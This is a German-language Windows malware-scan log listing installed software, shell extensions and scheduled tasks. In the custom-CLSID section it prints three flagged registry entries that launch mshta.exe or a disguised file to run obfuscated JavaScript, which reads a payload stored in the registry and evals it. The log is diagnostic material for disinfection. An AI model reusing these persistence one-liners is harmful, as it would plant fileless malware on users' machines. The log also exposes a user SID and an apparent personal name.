Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version:  - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.)
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Smart Defrag 5 (HKLM-x32\...\Smart Defrag_is1) (Version: 5.6.0 - IObit)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17042.12 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17042.12 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.10.4121.0 - Hi-Rez Studios)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
State of Decay (HKLM-x32\...\Steam App 241540) (Version:  - Undead Labs)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG)
System Shock 2 (HKLM-x32\...\1207659172_is1) (Version: 2.46 nd - GOG.com)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Banner Saga 2 (HKLM\...\Steam App 281640) (Version:  - Stoic)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Long Dark (HKLM\...\Steam App 305620) (Version:  - Hinterland Studio Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com)
Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version:  - Massive Entertainment)
TomTom MyDrive Connect 4.1.5.3181 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.5.3181 - TomTom)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version:  - Creative Assembly)
Trojan Remover (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.5.2952 - Simply Super Software)
Tyranny (HKLM\...\Steam App 362960) (Version:  - Obsidian Entertainment)
Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version:  - Fatshark)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version:  - MachineGames)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\5b53a: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\qofqow: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers1: [IobitStartMenu] -> {AF8FA9C9-9907-463e-BDC3-4CC1200D6310} => C:\Program Files (x86)\IObit\Classic Start\IObitStartMenuExtension.dll [2015-12-29] (IObit)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Keine Datei
ContextMenuHandlers1-x32: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2017-07-14] (Avira Operations GmbH & Co. KG)
ContextMenuHandlers1-x32: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers1-x32: [SystemSpeedupFilesMenu] -> {ef263503-8f0e-3e6a-ae2e-fe0b4b441d52} => C:\Windows\system32\mscoree.dll [2017-03-18] (Microsoft Corporation)
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers4: [IobitStartMenu] -> {AF8FA9C9-9907-463e-BDC3-4CC1200D6310} => C:\Program Files (x86)\IObit\Classic Start\IObitStartMenuExtension.dll [2015-12-29] (IObit)
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers4: [SystemSpeedupFoldersMenu] -> {3d52b24d-33bb-3895-99ea-a0156f24a3f9} => C:\Windows\system32\mscoree.dll [2017-03-18] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers5: [SystemSpeedupDesktopMenu] -> {cefaf456-bc17-3f4b-b7d9-75070925911b} => C:\Windows\system32\mscoree.dll [2017-03-18] (Microsoft Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [IobitStartMenu] -> {AF8FA9C9-9907-463e-BDC3-4CC1200D6310} => C:\Program Files (x86)\IObit\Classic Start\IObitStartMenuExtension.dll [2015-12-29] (IObit)
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers6: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2017-07-14] (Avira Operations GmbH & Co. KG)
ContextMenuHandlers6: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff"
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {0F18B96D-1527-4762-AC7E-B1CCB73AF929} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe [2016-06-06] (IObit)
Task: {126CB422-6DA9-4912-AA27-A193FABB0CE5} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\8 => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [2017-06-28] (Avira Operations GmbH & Co. KG) <==== ACHTUNG
Task: {16F4D39B-166A-4E5D-B764-42202105D976} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\7 => C:\PROGRA~2\simplitec\simplicheck\simplicheck.exe
Task: {1772C360-42E4-4485-A2AD-2DE74F81DA8F} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\2 => C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [2016-04-09] (Google, Inc) <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {1A68B86F-73A5-4DEA-B501-1218131090F6} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\9 => C:\Users\*****\AppData\Local\Microsoft\BingSvc\BingSvc.exe [2015-11-05] (© 2015 Microsoft Corporation) <==== ACHTUNG
Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {1BED19FA-D635-4E7D-B673-1960CBD95D71} - System32\Tasks\IObitSelfCheckTask => C:\Program Files (x86)\IObit\Smart Defrag\IObitSelfCheck.exe [2016-10-18] (IObit)
Task: {2355CBBB-9A32-4AD8-A0E3-DBA0E8BC34F3} - System32\Tasks\SmartDefrag_Update => C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe [2017-05-25] (IObit)
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {351619B3-1C70-488E-9AAC-94BA427BD1E5} - System32\Tasks\ASC10_SkipUac_***** => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2017-05-31] (IObit)
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {37AB47D1-E51C-463C-96F1-EDD5ADF87B12} - System32\Tasks\Avira\System Speedup\SpeedupSysTray => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.Systray.exe [2017-06-28] (Avira Operations GmbH & Co. KG)
Task: {3987A200-F363-455C-8A55-77B75D6B0375} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\11 => C:\Program Files\CCleaner\CCleaner64.exe [2017-06-30] (Piriform Ltd) <==== ACHTUNG
Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation)
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {462F3821-DF44-4068-9F97-EFFBC54179ED} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {4836CAB9-C852-490F-BAB1-8A404135B6F4} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\6 => C:\Windows\Installer\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe [2015-02-03] (Flexera Software LLC)
Task: {49B6B7FA-1D3C-4031-B46E-A7577EDF24BF} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\9 => C:\Program Files\Logitech Gaming Software\LCore.exe [2017-01-24] (Logitech Inc.)
Task: {4AC28567-F469-42F6-ACCA-B11646D325C4} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\12 => C:\Users\*****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2017-04-19] (Spotify Ltd) <==== ACHTUNG
Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation)
Task: {4E9BE3D2-2F38-4DE7-98B7-EDF25E6C4078} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [2017-03-22] (IObit)
Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-07-11] (Microsoft Corporation)
Task: {50DDE336-6A73-4D4D-8C3A-F2B645FDDC9B} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\8 => C:\PROGRA~2\Logitech\UE Music Library\UEMLTray.exe
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {577763E4-17E6-4D07-A67F-13108AB9872D} - System32\Tasks\Uninstaller_Install_Martin_Walser => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe [2017-02-08] (IObit)
Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {6277B01E-8C65-4DE6-9712-35ABEBF90E78} - System32\Tasks\StartMenu8_Start => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe [2016-11-05] ()
Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
